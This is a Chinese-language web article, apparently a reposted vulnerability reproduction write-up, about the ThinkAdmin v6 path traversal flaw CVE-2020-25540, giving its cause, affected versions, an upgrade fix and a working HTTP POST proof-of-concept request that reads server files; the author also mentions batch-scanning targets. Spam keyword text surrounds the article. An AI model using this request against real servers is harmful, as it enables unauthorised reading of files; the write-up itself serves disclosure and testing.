91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Thinkadmin v6任意文件讀取漏洞復現

發布時間:2021-12-28 17:46:41 來源:億速云 閱讀:491 作者:柒染 欄目:安全技術

本篇文章為大家展示了如何進行Thinkadmin v6任意文件讀取漏洞復現,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

如何進行Thinkadmin v6任意文件讀取漏洞復現

Thinkadmin v6任意文件讀取漏洞(CVE-2020-25540)復現

一、漏洞簡介:

ThinkAdmin是一套基于ThinkPHP框架的通用后臺管理系統,ThinkAdmin 的權限管理基于標準RBAC簡化而來,去除了繁雜的節點管理,使得權限管理起來更簡單,具體包含節點管理、權限管理、菜單管理、用戶管理。ThinkAdmin 6版本存在路徑遍歷漏洞。攻擊者可利用該漏洞通過GET請求編碼參數任意讀取遠程服務器上的文件。

二、漏洞成因:

https://github.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Update.php

Update.php中的函數方法未授權,可直接函數可直接調用。導致漏洞

三、影響范圍:

Thinkadmin版本小于 ≤ 2020.08.03.01

四、漏洞復現:

POC:

POST/admin.html?s=admin/api.Update/nodeHTTP/1.1Host: 127.0.0.1Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22rules=%5B%22.%2F%22%5D

簡單寫了一個批量的小腳本

如何進行Thinkadmin v6任意文件讀取漏洞復現

跑了一部分,成功的不多,HVV尾聲了,情況也正常。

如何進行Thinkadmin v6任意文件讀取漏洞復現

發現一個詭異的地方:burp直接放包不能成功回去json的返回數據

如何進行Thinkadmin v6任意文件讀取漏洞復現

python-嘗試python的request的post方法可以返回

如何進行Thinkadmin v6任意文件讀取漏洞復現

嘗試curl的post的方法可以正常返回數據

如何進行Thinkadmin v6任意文件讀取漏洞復現

下來再來研究這個問題。

五、修復方案:

目前廠商已經發布修復相關問題,請受影響用戶盡快升級到安全版本

上述內容就是如何進行Thinkadmin v6任意文件讀取漏洞復現,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

嘉鱼县| 韶山市| 尼玛县| 冷水江市| 荔浦县| 顺义区| 特克斯县| 禹城市| 云林县| 罗江县| 绥棱县| 正镶白旗| 安龙县| 洮南市| 二连浩特市| 恩施市| 英吉沙县| 开原市| 顺昌县| 确山县| 广元市| 华蓥市| 重庆市| 丹凤县| 彩票| 东丽区| 巨鹿县| 西峡县| 武功县| 资溪县| 邢台市| 江口县| 新安县| 隆德县| 芜湖县| 聂荣县| 周口市| 神木县| 太仆寺旗| 平南县| 福海县|